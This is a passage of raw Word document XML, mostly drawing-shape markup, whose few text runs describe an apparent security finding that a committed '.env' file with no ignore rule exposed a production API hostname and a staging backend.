                <v:rect id="Rectangle 1736" o:spid="_x0000_s1255" style="position:absolute;left:11065;top:19614;width:19301;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521DCC35" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> and editor directories, with </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1737" o:spid="_x0000_s1256" style="position:absolute;left:25579;top:19614;width:236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331228CA" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:proofErr w:type="gramStart"/>
                        <w:r w:rsidRPr="00C73B1A">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="auto"/>
                          </w:rPr>
                          <w:t>no</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="0B2D56"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 1738" o:spid="_x0000_s1257" style="position:absolute;left:27336;top:19431;width:2858;height:1428;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3YMxwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BT8JA&#10;EIXvJv6HzZh4g60alRQWYkQTOZBIgfukO3QburO1u5bCr3cOJN5m8t68981sMfhG9dTFOrCBh3EG&#10;irgMtubKwG77OZqAignZYhOYDJwpwmJ+ezPD3IYTb6gvUqUkhGOOBlxKba51LB15jOPQEot2CJ3H&#10;JGtXadvhScJ9ox+z7EV7rFkaHLb07qg8Fr/ewLpt6qSfP44/603hzvvv5apfXoy5vxvepqASDenf&#10;fL3+soL/+iS48o2MoOd/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAI+bdgzHAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" path="m9525,l276225,v2630,,4875,930,6736,2778c284820,4638,285750,6890,285750,9525r,123825c285750,135979,284820,138224,282961,140084v-1861,1861,-4106,2791,-6736,2791l9525,142875v-2630,,-4875,-930,-6735,-2791c930,138224,,135979,,133350l,9525c,6890,930,4638,2790,2778,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,285750,142875"/>
                </v:shape>
                <v:rect id="Rectangle 1739" o:spid="_x0000_s1258" style="position:absolute;left:27628;top:19667;width:3101;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39B880A8" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:b/>
                            <w:color w:val="0B2D56"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>.</w:t>
                        </w:r>
                        <w:r w:rsidRPr="00C73B1A">
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:b/>
                            <w:color w:val="auto"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>env</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1740" o:spid="_x0000_s1259" style="position:absolute;left:30229;top:19614;width:1210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21CF5242" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00C73B1A" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                          <w:rPr>
                            <w:color w:val="auto"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="0B2D56"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                        <w:r w:rsidRPr="00C73B1A">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="auto"/>
                          </w:rPr>
                          <w:t>rule of any kind</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1741" o:spid="_x0000_s1260" style="position:absolute;left:39330;top:19614;width:30624;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1AFF37E9" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t>. Nothing prevented the commit and nothing</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6576F5" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">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warned afterwards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559178E2" w14:textId="0AC83052"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file exposed the production API hostname and, in commented-out lines, an otherwise-undisclosed staging backend. Neither is a credential, so this is not the worst possible </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>outcome</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> but the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is what makes it serious: the file a developer will eventually put a real key into was being committed by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D754D0" w14:textId="3B0EBE9C" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="147" w:line="310" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="64"/>
        <w:jc w:val="both"/>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w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251762688" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="77805BD3" wp14:editId="124F9D4C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>256282</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-21773</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4352925" cy="752475"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27478" name="Group 27478"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4352925" cy="752475"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4352925" cy="752475"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1750" name="Shape 1750"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1219200" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1219200" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1209675" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1212305" y="0"/>
                                  <a:pt x="1214550" y="930"/>
                                  <a:pt x="1216410" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1218270" y="4638"/>
                                  <a:pt x="1219200" y="6890"/>
                                  <a:pt x="1219200" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1219200" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1219200" y="135979"/>
                                  <a:pt x="1218270" y="138224"/>
                                  <a:pt x="1216410" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1214550" y="141932"/>
                                  <a:pt x="1212305" y="142863"/>
                                  <a:pt x="1209675" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142863"/>
                                  <a:pt x="4650" y="141932"/>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53" name="Shape 1753"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1285875" y="0"/>
                            <a:ext cx="638175" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="638175" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="628650" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="631280" y="0"/>
                                  <a:pt x="633525" y="930"/>
                                  <a:pt x="635385" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="637245" y="4638"/>
                                  <a:pt x="638175" y="6890"/>
                                  <a:pt x="638175" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="638175" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="638175" y="135979"/>
                                  <a:pt x="637245" y="138224"/>
                                  <a:pt x="635385" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="633525" y="141932"/>
                                  <a:pt x="631280" y="142863"/>
                                  <a:pt x="628650" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142863"/>
                                  <a:pt x="4650" y="141932"/>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56" name="Shape 1756"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2724150" y="0"/>
                            <a:ext cx="285750" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="285750" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="276225" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="278855" y="0"/>
                                  <a:pt x="281100" y="930"/>
                                  <a:pt x="282960" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="284820" y="4638"/>
                                  <a:pt x="285750" y="6890"/>
                                  <a:pt x="285750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="285750" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="285750" y="135979"/>
                                  <a:pt x="284820" y="138224"/>
                                  <a:pt x="282960" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="281100" y="141932"/>
                                  <a:pt x="278855" y="142863"/>
                                  <a:pt x="276225" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142863"/>
                                  <a:pt x="4650" y="141932"/>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59" name="Shape 1759"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3076575" y="0"/>
                            <a:ext cx="400050" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="400050" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="390525" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="393155" y="0"/>
                                  <a:pt x="395400" y="930"/>
                                  <a:pt x="397260" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="399119" y="4638"/>
                                  <a:pt x="400050" y="6890"/>
                                  <a:pt x="400050" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="400050" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="400050" y="135979"/>
                                  <a:pt x="399119" y="138224"/>
                                  <a:pt x="397260" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="395400" y="141932"/>
                                  <a:pt x="393155" y="142863"/>
                                  <a:pt x="390525" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142863"/>
                                  <a:pt x="4650" y="141932"/>
                                  <a:pt x="2789" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>
                                  <a:pt x="0" y="135979"/>
                                  <a:pt x="0" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6890"/>
                                  <a:pt x="930" y="4638"/>
                                  <a:pt x="2789"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62" name="Shape 1762"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3543299" y="0"/>
                            <a:ext cx="809625" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="809625" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="800100" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="802730" y="0"/>
                                  <a:pt x="804975" y="930"/>
                                  <a:pt x="806835" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="808695" y="4638"/>
                                  <a:pt x="809625" y="6890"/>
                                  <a:pt x="809625" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="809625" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="809625" y="135979"/>
                                  <a:pt x="808695" y="138224"/>
                                  <a:pt x="806835" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="804975" y="141932"/>
                                  <a:pt x="802730" y="142863"/>
                                  <a:pt x="800100" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142863"/>
                                  <a:pt x="4650" y="141932"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>
                                  <a:pt x="0" y="135979"/>
                                  <a:pt x="0" y="133350"/>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68" name="Shape 1768"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2076450" y="180975"/>
                            <a:ext cx="342900" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="342900" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="333375" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="336005" y="0"/>
                                  <a:pt x="338250" y="930"/>
                                  <a:pt x="340110" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="341970" y="4638"/>
                                  <a:pt x="342900" y="6890"/>
                                  <a:pt x="342900" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="342900" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="342900" y="126448"/>
                                  <a:pt x="341970" y="128687"/>
                                  <a:pt x="340110" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="338250" y="132407"/>
                                  <a:pt x="336005" y="133338"/>
                                  <a:pt x="333375" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133338"/>
                                  <a:pt x="4650" y="132407"/>
                                  <a:pt x="2790" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128687"/>
                                  <a:pt x="0" y="126448"/>
                                  <a:pt x="0" y="123825"/>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74" name="Shape 1774"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1476375" y="352425"/>
                            <a:ext cx="285750" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="285750" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="276225" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="278855" y="0"/>
                                  <a:pt x="281100" y="930"/>
                                  <a:pt x="282960" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="284820" y="4638"/>
                                  <a:pt x="285750" y="6890"/>
                                  <a:pt x="285750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="285750" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="285750" y="126448"/>
                                  <a:pt x="284820" y="128687"/>
                                  <a:pt x="282960" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="281100" y="132407"/>
                                  <a:pt x="278855" y="133338"/>
                                  <a:pt x="276225" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133338"/>
                                  <a:pt x="4650" y="132407"/>
                                  <a:pt x="2790" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128687"/>
                                  <a:pt x="0" y="126448"/>
                                  <a:pt x="0" y="123825"/>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79" name="Shape 1779"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1619250" y="609600"/>
                            <a:ext cx="628650" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="628650" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="619125" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="621755" y="0"/>
                                  <a:pt x="624000" y="930"/>
                                  <a:pt x="625860" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="627720" y="4638"/>
                                  <a:pt x="628650" y="6890"/>
                                  <a:pt x="628650" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="628650" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="628650" y="135973"/>
                                  <a:pt x="627720" y="138212"/>
                                  <a:pt x="625860" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="624000" y="141932"/>
                                  <a:pt x="621755" y="142863"/>
                                  <a:pt x="619125" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142863"/>
                                  <a:pt x="4650" y="141932"/>
                                  <a:pt x="2790" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138212"/>
                                  <a:pt x="0" y="135973"/>
                                  <a:pt x="0" y="133350"/>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78" style="width:342.75pt;height:59.25pt;position:absolute;z-index:-2147483528;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:20.1797pt;mso-position-vertical-relative:text;margin-top:-1.71448pt;" coordsize="43529,7524">
                <v:shape id="Shape 1750" style="position:absolute;width:12192;height:1428;left:0;top:0;" coordsize="1219200,142875" path="m9525,0l1209675,0c1212305,0,1214550,930,1216410,2778c1218270,4638,1219200,6890,1219200,9525l1219200,133350c1219200,135979,1218270,138224,1216410,140084c1214550,141932,1212305,142863,1209675,142875l9525,142875c6895,142863,4650,141932,2790,140084c930,138224,0,135979,0,133350l0,9525c0,6890,930,4638,2790,2778c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 1753" style="position:absolute;width:6381;height:1428;left:12858;top:0;" coordsize="638175,142875" path="m9525,0l628650,0c631280,0,633525,930,635385,2778c637245,4638,638175,6890,638175,9525l638175,133350c638175,135979,637245,138224,635385,140084c633525,141932,631280,142863,628650,142875l9525,142875c6895,142863,4650,141932,2790,140084c930,138224,0,135979,0,133350l0,9525c0,6890,930,4638,2790,2778c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 1756" style="position:absolute;width:2857;height:1428;left:27241;top:0;" coordsize="285750,142875" path="m9525,0l276225,0c278855,0,281100,930,282960,2778c284820,4638,285750,6890,285750,9525l285750,133350c285750,135979,284820,138224,282960,140084c281100,141932,278855,142863,276225,142875l9525,142875c6895,142863,4650,141932,2790,140084c930,138224,0,135979,0,133350l0,9525c0,6890,930,4638,2790,2778c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 1759" style="position:absolute;width:4000;height:1428;left:30765;top:0;" coordsize="400050,142875" path="m9525,0l390525,0c393155,0,395400,930,397260,2778c399119,4638,400050,6890,400050,9525l400050,133350c400050,135979,399119,138224,397260,140084c395400,141932,393155,142863,390525,142875l9525,142875c6895,142863,4650,141932,2789,140084c930,138224,0,135979,0,133350l0,9525c0,6890,930,4638,2789,2778c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 1762" style="position:absolute;width:8096;height:1428;left:35432;top:0;" coordsize="809625,142875" path="m9525,0l800100,0c802730,0,804975,930,806835,2778c808695,4638,809625,6890,809625,9525l809625,133350c809625,135979,808695,138224,806835,140084c804975,141932,802730,142863,800100,142875l9525,142875c6895,142863,4650,141932,2790,140084c930,138224,0,135979,0,133350l0,9525c0,6890,930,4638,2790,2778c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 1768" style="position:absolute;width:3429;height:1333;left:20764;top:1809;" coordsize="342900,133350" path="m9525,0l333375,0c336005,0,338250,930,340110,2778c341970,4638,342900,6890,342900,9525l342900,123825c342900,126448,341970,128687,340110,130547c338250,132407,336005,133338,333375,133350l9525,133350c6895,133338,4650,132407,2790,130547c930,128687,0,126448,0,123825l0,9525c0,6890,930,4638,2790,2778c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 1774" style="position:absolute;width:2857;height:1333;left:14763;top:3524;" coordsize="285750,133350" path="m9525,0l276225,0c278855,0,281100,930,282960,2791c284820,4638,285750,6890,285750,9525l285750,123825c285750,126448,284820,128687,282960,130547c281100,132407,278855,133338,276225,133350l9525,133350c6895,133338,4650,132407,2790,130547c930,128687,0,126448,0,123825l0,9525c0,6890,930,4638,2790,2791c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 1779" style="position:absolute;width:6286;height:1428;left:16192;top:6096;" coordsize="628650,142875" path="m9525,0l619125,0c621755,0,624000,930,625860,2791c627720,4638,628650,6890,628650,9525l628650,133350c628650,135973,627720,138212,625860,140072c624000,141932,621755,142863,619125,142875l9525,142875c6895,142863,4650,141932,2790,140072c930,138212,0,135973,0,133350l0,9525c0,6890,930,4638,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3712" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="135238F7" wp14:editId="546012BA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5466457</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-21773</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="752475" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27479" name="Group 27479"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="752475" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="752475" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1765" name="Shape 1765"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="752475" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
